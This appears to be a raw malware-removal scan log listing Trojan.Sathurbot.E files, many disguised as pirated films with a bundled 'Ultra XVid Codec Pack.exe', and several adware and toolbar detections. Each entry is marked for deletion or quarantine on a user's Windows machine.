Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\4b468578921d69825db9f3c80678664b\Ghost In The Shell 2017.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\4b468578921d69825db9f3c80678664b\Ghost In The Shell 2017.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\4b468578921d69825db9f3c80678664b\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\4c7fc889b07f3fae40526a7f39ac34dd\Miss Peregrines Home for Peculiar Children.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\4c7fc889b07f3fae40526a7f39ac34dd\Miss Peregrines Home for Peculiar Children.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\4c7fc889b07f3fae40526a7f39ac34dd\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\4cfccf2b7ab56112367e4add655165ed\La tortue rouge 2016.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\4cfccf2b7ab56112367e4add655165ed\La tortue rouge 2016.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\4cfccf2b7ab56112367e4add655165ed\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\4d26033c23c5eb763dc97044da803b3f\Trolls 2016.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\4d26033c23c5eb763dc97044da803b3f\Trolls 2016.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\4d26033c23c5eb763dc97044da803b3f\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\52103c6d72a58fcc5177ba768e10d13a\Back To The Future 2016.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\52103c6d72a58fcc5177ba768e10d13a\Back To The Future 2016.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\52103c6d72a58fcc5177ba768e10d13a\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\52a38425d712166eee12e8bf380ea984\McAfee AntiVirus Plus 2015.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\52a38425d712166eee12e8bf380ea984\McAfee AntiVirus Plus 2015.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\e099fdbf84410511c0f424d389fc60a2\Setup.dat, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\e099fdbf84410511c0f424d389fc60a2\Video Editor Slideshow Maker varies by.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\e099fdbf84410511c0f424d389fc60a2\Video Editor Slideshow Maker varies by.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\e112b9581d3d5ba2651112319eb4672d\Behind The Walls 2017.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\e112b9581d3d5ba2651112319eb4672d\Behind The Walls 2017.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\e112b9581d3d5ba2651112319eb4672d\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\e1d3d7b0d3d53ad7a58fc9ae1a7d7fb9\Autodesk AutoCAD 2016.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\e1d3d7b0d3d53ad7a58fc9ae1a7d7fb9\Autodesk AutoCAD 2016.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\e1d3d7b0d3d53ad7a58fc9ae1a7d7fb9\Setup.dat, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\e2d766817600073df74c0cf6b0b61496\I Daniel Blake 2016.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\e2d766817600073df74c0cf6b0b61496\I Daniel Blake 2016.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\e2d766817600073df74c0cf6b0b61496\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\e78ef53bd32609839d2737d2ecc0cf01\Fallout Shelter 2016.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\e78ef53bd32609839d2737d2ecc0cf01\Fallout Shelter 2016.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\e78ef53bd32609839d2737d2ecc0cf01\Setup1.dat, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\e78ef53bd32609839d2737d2ecc0cf01\Setup2.dat, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\e99153e73fac59432bc922fff075bc0f\Nt Live One Man Two Guvnors.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\e99153e73fac59432bc922fff075bc0f\Nt Live One Man Two Guvnors.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\e99153e73fac59432bc922fff075bc0f\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\e9f653c8aa546072140276f9706f7792\El Jeremias 2016.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\e9f653c8aa546072140276f9706f7792\El Jeremias 2016.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\e9f653c8aa546072140276f9706f7792\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\eb44cb5d0f487dc8aab2f8d517ff7536\The Shining 2016.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\eb44cb5d0f487dc8aab2f8d517ff7536\The Shining 2016.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\eb44cb5d0f487dc8aab2f8d517ff7536\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\5d8a4e35087c99336bdd7ac68d24e6d0\The Blacklist [SE03].txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\5d8a4e35087c99336bdd7ac68d24e6d0\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\5d8a4e35087c99336bdd7ac68d24e6d0\Video.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\5e1b9e8970a28f28e6a2991c1a12a3e2\The Witch 2016.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\5e1b9e8970a28f28e6a2991c1a12a3e2\The Witch 2016.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\5e1b9e8970a28f28e6a2991c1a12a3e2\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\60e5bb6744a7342441c49a380d3eed3b\Geethaiyin Raadhai 2016.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\60e5bb6744a7342441c49a380d3eed3b\Geethaiyin Raadhai 2016.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\60e5bb6744a7342441c49a380d3eed3b\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\63cbf76f3e3cf9d4a2df1e524d6b21ec\Autodesk AutoCAD Design Suite Ultimate 2016.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\63cbf76f3e3cf9d4a2df1e524d6b21ec\Autodesk AutoCAD Design Suite Ultimate 2016.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\63cbf76f3e3cf9d4a2df1e524d6b21ec\Setup.dat, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\64a5e5ce5691ea61f806e4f0816da6a8\Compadres 2016.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\64a5e5ce5691ea61f806e4f0816da6a8\Compadres 2016.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\64a5e5ce5691ea61f806e4f0816da6a8\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\65b917aee136d34b3beecc082ae85412\Rudy Habibie 2016.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\65b917aee136d34b3beecc082ae85412\Rudy Habibie 2016.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\65b917aee136d34b3beecc082ae85412\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\661b0595c94df273a12dd98fdc0668d5\Kubo en het Magische Zwaard 2016.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\661b0595c94df273a12dd98fdc0668d5\Kubo en het Magische Zwaard 2016.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\661b0595c94df273a12dd98fdc0668d5\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\667cf4fefa31563c464ffd08433c8d97\Renegades 2017.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\667cf4fefa31563c464ffd08433c8d97\Renegades 2017.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\667cf4fefa31563c464ffd08433c8d97\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\6754cfecae61493964516786e862034a\Bad Moms 2016.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\6754cfecae61493964516786e862034a\Bad Moms 2016.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\6754cfecae61493964516786e862034a\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\1075b8b59dc1f15e17c847c905d14e97, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\142cd272e67cc627cb7658383c10dff1, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\34a398fb6c571d1c4d38e5f036bbe84e, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\46e857a9a79c381947d265ac75ec2847, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\508203ef6321fb6dc738f00f21bad019, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\5749592f1eebcef050bc81d6ed961171, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\6df28ba66161ee6c0352c43eca6c22a5, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\8e77243eb080bb15877d2d15423d20bd, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\b252f0514879d60d06bdfbb2e2f335bb, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\db11711c1687251bf1e685038caa4a44, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\dbadf687331785c824ea9f609eee1831, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\fe6b44aa3580d4f604a84c56ef7ca7da, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\zepplauncher.mif, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\temp\tmp1F92.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\temp\tmp1F92.tmp, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\temp\tmp23CF.tmp, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\temp\tmp498.tmp, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\temp\tmp5A27.tmp, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\temp\tmpA370.tmp, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\temp\tmpACA3.tmp, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\temp\tmpAE0F.tmp, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\temp\tmpB225.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\temp\tmpB225.tmp, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\temp\tmpC029.tmp, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\temp\tmpCE31.tmp, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\temp\tmpD29A.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\temp\tmpD29A.tmp, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\temp\tmpD362.tmp, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\temp\tmpE356.tmp, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\temp\tmpE717.tmp, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\temp\tmpF2DA.tmp, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\temp\tmpFA85.tmp, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\temp\{2A60F4FC-8524-941B-6ED8-4EE302D5A84F}, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\temp\{4D305BE4-0513-3BCB-A040-9216CFB71C30}, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\temp\{9C7E8EBB-17D8-5671-12F3-B4BA9AF642DD}, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\temp\{AC6A6908-CE0E-C435-726C-AD16E74D74DF}, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\temp\{ED683017-9F65-95E0-BBA4-64D47BF05F7B}, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\temp\{F50DB538-6F6E-58F2-22BB-19BF17A80788}, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\PerformanceMonitor.dll, Delete-on-Reboot, [2851], [355073],1.0.1064
PUP.Optional.PCKeeper, C:\PROGRAMDATA\KROMTECH\INSTALLER.EXE, Quarantined, [1060], [79194],1.0.1064
PUP.Optional.OpenCandy, C:\Users\Lac\AppData\Roaming\OpenCandy\138AEBC68F954148996D9E789C14C56E\syacvtp1_v5.exe, Quarantined, [646], [173202],1.0.1064
PUP.Optional.OpenCandy, C:\Users\Lac\AppData\Roaming\OpenCandy\634914D41B93453E93664C7922DF3EE3\TuneUpUtilities_Ireland_Exp1.exe, Quarantined, [646], [173202],1.0.1064
PUP.Optional.OpenCandy, C:\Users\Lac\AppData\Roaming\OpenCandy\6E2F275651E84F428E6E81210C9C30B4\Opera_NI_stable.exe, Quarantined, [646], [173202],1.0.1064
PUP.Optional.OpenCandy, C:\Users\Lac\AppData\Roaming\OpenCandy\A25C1BF3C19C4D72826652B23BB266D0\LenovoSHAREit2.2.2-42715.exe, Quarantined, [646], [173202],1.0.1064
PUP.Optional.BlockAndSurf, C:\Program Files (x86)\-BlockAndSurf-soft\174.crx, Quarantined, [12575], [175680],1.0.1064
PUP.Optional.BlockAndSurf, C:\Program Files (x86)\-BlockAndSurf-soft\174.xpi, Quarantined, [12575], [175680],1.0.1064
PUP.Optional.BlockAndSurf, C:\Program Files (x86)\-BlockAndSurf-soft\a.db, Quarantined, [12575], [175680],1.0.1064
PUP.Optional.BlockAndSurf, C:\Program Files (x86)\-BlockAndSurf-soft\b.db, Quarantined, [12575], [175680],1.0.1064
PUP.Optional.BlockAndSurf, C:\Program Files (x86)\-BlockAndSurf-soft\BlockAndSurfxM174.bin, Quarantined, [12575], [175680],1.0.1064
PUP.Optional.BlockAndSurf, C:\Program Files (x86)\-BlockAndSurf-soft\Sqlite3.dll, Quarantined, [12575], [175680],1.0.1064
PUP.Optional.FFToolbar, C:\Users\Lac\AppData\Roaming\Mozilla\Firefox\Profiles\bwyng1s2.default\extensions\fftoolbar2014@etech.com\chrome\content\toolbar.js, Quarantined, [13967], [177138],1.0.1064
PUP.Optional.FFToolbar, C:\Users\Lac\AppData\Roaming\Mozilla\Firefox\Profiles\bwyng1s2.default\extensions\fftoolbar2014@etech.com\chrome\content\toolbar.xul, Quarantined, [13967], [177138],1.0.1064
PUP.Optional.FFToolbar, C:\Users\Lac\AppData\Roaming\Mozilla\Firefox\Profiles\bwyng1s2.default\extensions\fftoolbar2014@etech.com\chrome\skin\icon.png, Quarantined, [13967], [177138],1.0.1064
PUP.Optional.FFToolbar, C:\Users\Lac\AppData\Roaming\Mozilla\Firefox\Profiles\bwyng1s2.default\extensions\fftoolbar2014@etech.com\chrome.manifest, Quarantined, [13967], [177138],1.0.1064
PUP.Optional.FFToolbar, C:\Users\Lac\AppData\Roaming\Mozilla\Firefox\Profiles\bwyng1s2.default\extensions\fftoolbar2014@etech.com\install.rdf, Quarantined, [13967], [177138],1.0.1064
PUP.Optional.SearchEngine, C:\Users\Lac\AppData\Roaming\Mozilla\Firefox\Profiles\bwyng1s2.default\extensions\searchengine@gmail.com\chrome\content\toolbar.js, Quarantined, [14373], [179432],1.0.1064
PUP.Optional.SearchEngine, C:\Users\Lac\AppData\Roaming\Mozilla\Firefox\Profiles\bwyng1s2.default\extensions\searchengine@gmail.com\chrome\content\toolbar.xul, Quarantined, [14373], [179432],1.0.1064
PUP.Optional.SearchEngine, C:\Users\Lac\AppData\Roaming\Mozilla\Firefox\Profiles\bwyng1s2.default\extensions\searchengine@gmail.com\chrome\skin\icon.png, Quarantined, [14373], [179432],1.0.1064
PUP.Optional.SearchEngine, C:\Users\Lac\AppData\Roaming\Mozilla\Firefox\Profiles\bwyng1s2.default\extensions\searchengine@gmail.com\chrome.manifest, Quarantined, [14373], [179432],1.0.1064
PUP.Optional.SearchEngine, C:\Users\Lac\AppData\Roaming\Mozilla\Firefox\Profiles\bwyng1s2.default\extensions\searchengine@gmail.com\install.rdf, Quarantined, [14373], [179432],1.0.1064
PUP.Optional.Linkey.AppFlsh, C:\Users\Lac\AppData\Local\Google\Chrome\User Data\default\extensions\fpmeembnagmagppkgghhfjfdfajdfcah\2.0.0.5_0\_metadata\verified_contents.json, Quarantined, [14740], [181535],1.0.1064
PUP.Optional.Linkey.AppFlsh, C:\Users\Lac\AppData\Local\Google\Chrome\User Data\default\extensions\fpmeembnagmagppkgghhfjfdfajdfcah\2.0.0.5_0\action-icon.png, Quarantined, [14740], [181535],1.0.1064
PUP.Optional.Linkey.AppFlsh, C:\Users\Lac\AppData\Local\Google\Chrome\User Data\default\extensions\fpmeembnagmagppkgghhfjfdfajdfcah\2.0.0.5_0\background.html, Quarantined, [14740], [181535],1.0.1064
PUP.Optional.Linkey.AppFlsh, C:\Users\Lac\AppData\Local\Google\Chrome\User Data\default\extensions\fpmeembnagmagppkgghhfjfdfajdfcah\2.0.0.5_0\background.js, Quarantined, [14740], [181535],1.0.1064
PUP.Optional.Linkey.AppFlsh, C:\Users\Lac\AppData\Local\Google\Chrome\User Data\default\extensions\fpmeembnagmagppkgghhfjfdfajdfcah\2.0.0.5_0\bright_green_19_19.png, Quarantined, [14740], [181535],1.0.1064
PUP.Optional.Linkey.AppFlsh, C:\Users\Lac\AppData\Local\Google\Chrome\User Data\default\extensions\fpmeembnagmagppkgghhfjfdfajdfcah\2.0.0.5_0\content.js, Quarantined, [14740], [181535],1.0.1064
PUP.Optional.Linkey.AppFlsh, C:\Users\Lac\AppData\Local\Google\Chrome\User Data\default\extensions\fpmeembnagmagppkgghhfjfdfajdfcah\2.0.0.5_0\default_19_19.ico, Quarantined, [14740], [181535],1.0.1064
PUP.Optional.Linkey.AppFlsh, C:\Users\Lac\AppData\Local\Google\Chrome\User Data\default\extensions\fpmeembnagmagppkgghhfjfdfajdfcah\2.0.0.5_0\default_19_19.png, Quarantined, [14740], [181535],1.0.1064
PUP.Optional.Linkey.AppFlsh, C:\Users\Lac\AppData\Local\Google\Chrome\User Data\default\extensions\fpmeembnagmagppkgghhfjfdfajdfcah\2.0.0.5_0\hard_green_19_19.png, Quarantined, [14740], [181535],1.0.1064
PUP.Optional.Linkey.AppFlsh, C:\Users\Lac\AppData\Local\Google\Chrome\User Data\default\extensions\fpmeembnagmagppkgghhfjfdfajdfcah\2.0.0.5_0\icon128.png, Quarantined, [14740], [181535],1.0.1064
PUP.Optional.Linkey.AppFlsh, C:\Users\Lac\AppData\Local\Google\Chrome\User Data\default\extensions\fpmeembnagmagppkgghhfjfdfajdfcah\2.0.0.5_0\icon16.png, Quarantined, [14740], [181535],1.0.1064
PUP.Optional.Linkey.AppFlsh, C:\Users\Lac\AppData\Local\Google\Chrome\User Data\default\extensions\fpmeembnagmagppkgghhfjfdfajdfcah\2.0.0.5_0\icon48.png, Quarantined, [14740], [181535],1.0.1064
PUP.Optional.Linkey.AppFlsh, C:\Users\Lac\AppData\Local\Google\Chrome\User Data\default\extensions\fpmeembnagmagppkgghhfjfdfajdfcah\2.0.0.5_0\manifest.json, Quarantined, [14740], [181535],1.0.1064
PUP.Optional.Linkey.AppFlsh, C:\Users\Lac\AppData\Local\Google\Chrome\User Data\default\extensions\fpmeembnagmagppkgghhfjfdfajdfcah\2.0.0.5_0\newtab.html, Quarantined, [14740], [181535],1.0.1064
PUP.Optional.Linkey.AppFlsh, C:\Users\Lac\AppData\Local\Google\Chrome\User Data\default\extensions\fpmeembnagmagppkgghhfjfdfajdfcah\2.0.0.5_0\orange_19_19.png, Quarantined, [14740], [181535],1.0.1064
PUP.Optional.Linkey.AppFlsh, C:\Users\Lac\AppData\Local\Google\Chrome\User Data\default\extensions\fpmeembnagmagppkgghhfjfdfajdfcah\2.0.0.5_0\red_19_19.png, Quarantined, [14740], [181535],1.0.1064
PUP.Optional.Linkey.AppFlsh, C:\Users\Lac\AppData\Local\Google\Chrome\User Data\default\extensions\fpmeembnagmagppkgghhfjfdfajdfcah\2.0.0.5_0\yellow_19_19.png, Quarantined, [14740], [181535],1.0.1064
